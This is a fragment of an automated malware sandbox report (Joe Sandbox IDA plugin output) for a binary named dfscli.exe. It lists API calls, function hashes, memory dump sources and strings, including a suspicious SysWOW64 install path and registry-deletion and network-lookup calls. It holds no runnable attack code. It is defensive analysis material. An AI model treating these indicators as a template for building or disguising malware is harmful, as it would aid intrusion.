                                                                  • Opcode ID: a1790f47c41936bced6b79c6f2a35fe46a97817065e715ad083577d6fcbb4a13
                                                                  • Instruction ID: 1d15696ca511e8db17db0566d3fc480254b9efd771fcc7e6bea79be161feb034
                                                                  • Opcode Fuzzy Hash: a1790f47c41936bced6b79c6f2a35fe46a97817065e715ad083577d6fcbb4a13
                                                                  • Instruction Fuzzy Hash: EC31C232E00229EBCF20CBA6DD44AEE7B78EB14354F540C76E901F7290D6768E51DB98
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00428681
                                                                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004286AA
                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 004286CE
                                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00428761
                                                                  • RegCloseKey.ADVAPI32(?), ref: 0042876F
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CloseDeleteEnumH_prologOpen
                                                                  • String ID:
                                                                  • API String ID: 3131381098-0
                                                                  • Opcode ID: 3da1cfe8e0bdcdf6bb3580b66696eb1dbd77266631f15c1d34462537c3854d5f
                                                                  • Instruction ID: 3b1ea214686a536e0a2d4bea5f1d2e89e807bfaa4abb09b0d42beed4e779e599
                                                                  • Opcode Fuzzy Hash: 3da1cfe8e0bdcdf6bb3580b66696eb1dbd77266631f15c1d34462537c3854d5f
                                                                  • Instruction Fuzzy Hash: 6521BC32E00128AFDB21DB54DC44BEEB7B4FB08310F0042AAE855B72A0CB388E51DF94
                                                                  APIs
                                                                    • Part of subcall function 00423C94: GetDlgItem.USER32(?,?), ref: 00423CA1
                                                                  • SendMessageA.USER32(?,00000087,00000000,00000000), ref: 004272F4
                                                                  • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 00427308
                                                                  • SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 0042732E
                                                                  • GetWindow.USER32(?,00000002), ref: 00427338
                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 00427348
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ItemLong
                                                                  • String ID:
                                                                  • API String ID: 1613074769-0
                                                                  • Opcode ID: 97cbf4e57a23a0da11286c9286a259086bce15a030b63461e7beaaeda3af21d2
                                                                  • Instruction ID: fe25e8e1c6ca3775ff26ef85d9a3a830e02c818cf282e5b9224e09687ff5b461
                                                                  • Opcode Fuzzy Hash: 97cbf4e57a23a0da11286c9286a259086bce15a030b63461e7beaaeda3af21d2
                                                                  • Instruction Fuzzy Hash: FC116D7120422AFFDF109F51EC84EAA7B29FF443A4F508126FD154A2A0CB34AD51DBA4
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorH_prologLastgethostbynamehtonsinet_addr
                                                                  • String ID:
                                                                  • API String ID: 3864313882-0
                                                                  • Opcode ID: 4b5bd378ccf6621e41f5217fc09554331f5af7f9c8d6f30778e4ca4430e9895b
                                                                  • Instruction ID: 55ba63c0e82c93a398f165e94c6545409e9e25af3e370e3a1538512de266e412
                                                                  • Opcode Fuzzy Hash: 4b5bd378ccf6621e41f5217fc09554331f5af7f9c8d6f30778e4ca4430e9895b
                                                                  • Instruction Fuzzy Hash: 4D116D31A00228DFCB10EFA5E8859EDBBB4FF08754F40456AF405A72A1D7389A51CF99
                                                                  APIs
                                                                  • GetMapMode.GDI32(?,?,?,?,?,?,00407712,?,00000000,?,7694E800), ref: 00427DC5
                                                                  • GetDeviceCaps.GDI32(?,00000058), ref: 00427DFF
                                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 00427E08
                                                                    • Part of subcall function 00426049: MulDiv.KERNEL32(?,00000000,00000000), ref: 00426089
                                                                    • Part of subcall function 00426049: MulDiv.KERNEL32(00000000,00000000,00000000), ref: 004260A6
                                                                  • MulDiv.KERNEL32(?,000009EC,00000060), ref: 00427E2C
                                                                  • MulDiv.KERNEL32(00000000,000009EC,7694E800), ref: 00427E37
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDevice$Mode
                                                                  • String ID:
                                                                  • API String ID: 696222070-0
                                                                  • Opcode ID: 4f3f8492715973c01261396f95e4a9daf1e0a3e3b78cb544d1ec3266c9131d15
                                                                  • Instruction ID: 2e381f7fe369a97062e71ca8c090e36ae9c4614a4b77d937c301da42c517efac
                                                                  • Opcode Fuzzy Hash: 4f3f8492715973c01261396f95e4a9daf1e0a3e3b78cb544d1ec3266c9131d15
                                                                  • Instruction Fuzzy Hash: E711C231700624AFDB21AF5ADC44C2EBBA9FF88710752042AFA4597360C775AC028F94
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,00000000,0040F9CC,004108AA,00000000,00431B30,00000008,00410901,?,?,?,00410723,00000004,00431B20,00000010,0041200F), ref: 00411DA7
                                                                  • FlsGetValue.KERNEL32(?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00411DB5
                                                                  • SetLastError.KERNEL32(00000000,?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00411E0B
                                                                    • Part of subcall function 004106DA: __lock.LIBCMT ref: 0041071E
                                                                    • Part of subcall function 004106DA: HeapAlloc.KERNEL32(00000008,?,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 0041075C
                                                                  • FlsSetValue.KERNEL32(00000000,?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00411DDC
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00411DF4
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastValue$AllocCurrentHeapThread__lock
                                                                  • String ID:
                                                                  • API String ID: 3368326513-0
                                                                  • Opcode ID: a2e0e11b31321dbee8d00aaa3ff715e8f4c10284b2315e1796a463f44e233b22
                                                                  • Instruction ID: 2e555c96cbcdb27f1e987eae822a5d52ba16f41a925a0101c91ccab380ceafb0
                                                                  • Opcode Fuzzy Hash: a2e0e11b31321dbee8d00aaa3ff715e8f4c10284b2315e1796a463f44e233b22
                                                                  • Instruction Fuzzy Hash: 9CF0FC31B01711DFD7301FB1AC4A6877BA4FB00762B00563AF982E62B0CB74884147E8
                                                                  APIs
                                                                  • TlsFree.KERNEL32(006434D8,?,?,00429DC7,00000000,00000001), ref: 00429D76
                                                                  • GlobalHandle.KERNEL32(006125A0), ref: 00429D84
                                                                  • GlobalUnlock.KERNEL32(00000000,?,?,00429DC7,00000000,00000001), ref: 00429D8D
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00429D94
                                                                  • DeleteCriticalSection.KERNEL32(0043F184,?,?,00429DC7,00000000,00000001), ref: 00429D9E
                                                                    • Part of subcall function 00429BB8: EnterCriticalSection.KERNEL32(?), ref: 00429C15
                                                                    • Part of subcall function 00429BB8: LeaveCriticalSection.KERNEL32(?,?), ref: 00429C25
                                                                    • Part of subcall function 00429BB8: LocalFree.KERNEL32(?), ref: 00429C2E
                                                                    • Part of subcall function 00429BB8: TlsSetValue.KERNEL32(?,00000000), ref: 00429C40
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                                                                  • String ID:
                                                                  • API String ID: 1549993015-0
                                                                  APIs
                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00412E2A
                                                                  • GetCurrentProcessId.KERNEL32 ref: 00412E36
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00412E3E
                                                                  • GetTickCount.KERNEL32 ref: 00412E46
                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00412E52
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                  • String ID:
                                                                  • API String ID: 1445889803-0
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0040B697
                                                                  • CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 0040B7BE
                                                                  • CoTaskMemFree.OLE32(?,?,00000000), ref: 0040B9D6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Task$AllocFreeH_prolog
                                                                  • String ID:
                                                                  • API String ID: 1522537378-3916222277
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ClearH_prologVariant
                                                                  • String ID: @$@
                                                                  • API String ID: 1166855276-149943524
                                                                  APIs
                                                                  • GetMenuCheckMarkDimensions.USER32 ref: 004289E3
                                                                  • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 00428A85
                                                                  • LoadBitmapA.USER32(00000000,00007FE3), ref: 00428A9D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
                                                                  • String ID:
                                                                  • API String ID: 2596413745-3916222277
                                                                  APIs
                                                                  • ___initmbctable.LIBCMT ref: 004129D7
                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\rtmpal\dfscli.exe,00000104,76230A60,00000000,?,?,?,?,0040E931,?,00431A70,00000060), ref: 004129EF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleName___initmbctable
                                                                  • String ID: C:\Windows\SysWOW64\rtmpal\dfscli.exe$P5`
                                                                  • API String ID: 767393020-246195047
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID: 4C$TC$hC
                                                                  • API String ID: 3519838083-3679543769
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                  • API String ID: 3519838083-1866435925
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: H_prologIncrefstd::locale::facet::_
                                                                  • String ID: bad cast
                                                                  • API String ID: 931760182-3145022300
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0041C94D
                                                                  • int.LIBCPMT ref: 0041C971
                                                                    • Part of subcall function 0041C9EC: __EH_prolog.LIBCMT ref: 0041C9F1
                                                                  • std::locale::facet::_Incref.LIBCPMT ref: 0041C9C4
                                                                    • Part of subcall function 0040E342: RaiseException.KERNEL32(?,?,?,?,0043F1A0,00000000), ref: 0040E370
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog$ExceptionIncrefRaisestd::locale::facet::_
                                                                  • String ID: bad cast
                                                                  • API String ID: 854657108-3145022300
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004282FE
                                                                  • PathFindExtensionA.SHLWAPI(?), ref: 00428315
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 0042833F
                                                                    • Part of subcall function 00427FF6: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00428019
                                                                    • Part of subcall function 00427FF6: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00428024
                                                                    • Part of subcall function 00427FF6: ConvertDefaultLocale.KERNEL32(?), ref: 00428055
                                                                    • Part of subcall function 00427FF6: ConvertDefaultLocale.KERNEL32(?), ref: 0042805D
                                                                    • Part of subcall function 00427FF6: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0042806A
                                                                    • Part of subcall function 00427FF6: ConvertDefaultLocale.KERNEL32(?), ref: 00428084
                                                                    • Part of subcall function 00427FF6: ConvertDefaultLocale.KERNEL32(000003FF), ref: 0042808A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ConvertDefaultLocale$AddressModuleProc$ExtensionFileFindHandleNamePathlstrcpy
                                                                  • String ID: %s.dll
                                                                  • API String ID: 4178508759-3668843792
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: FreeTask$ClearH_prologVariant
                                                                  • String ID:
                                                                  • API String ID: 82050969-0
APIs
• IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 021C21F9
• SetLastError.KERNEL32(0000007E), ref: 021C223B
Memory Dump Source
• Source File: 00000002.00000002.2117474523.00000000021C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_21c1000_dfscli.jbxd
Similarity
• API ID: ErrorHugeLastRead
• String ID:
• API String ID: 3239643929-0
APIs
• ReadFile.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 00419D81
• GetLastError.KERNEL32(?,?,?), ref: 00419D8B
• ReadFile.KERNEL32(?,?,00000001,?,00000000,?,?,?), ref: 00419E54
• GetLastError.KERNEL32(?,?,?), ref: 00419E5E
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: ErrorFileLastRead
• String ID:
• API String ID: 1948546556-0
APIs
• IsWindowVisible.USER32(?), ref: 0040BAF0
• GetDesktopWindow.USER32 ref: 0040BB03
• GetWindowRect.USER32(?,?), ref: 0040BB16
• GetWindowRect.USER32(?,?), ref: 0040BB23
  • Part of subcall function 00423D5B: MoveWindow.USER32(?,?,?,00000000,?,00000000,?,0040BC64,?,?), ref: 00423D76
  • Part of subcall function 00423D99: ShowWindow.USER32(?,?,0040BC6D,00000000,?,?), ref: 00423DA6
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: Window$Rect$DesktopMoveShowVisible
• String ID:
• API String ID: 3835705305-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: _strcspn_strlen_strncpy_strpbrk
• String ID:
• API String ID: 635841138-0
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001), ref: 0041700F
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
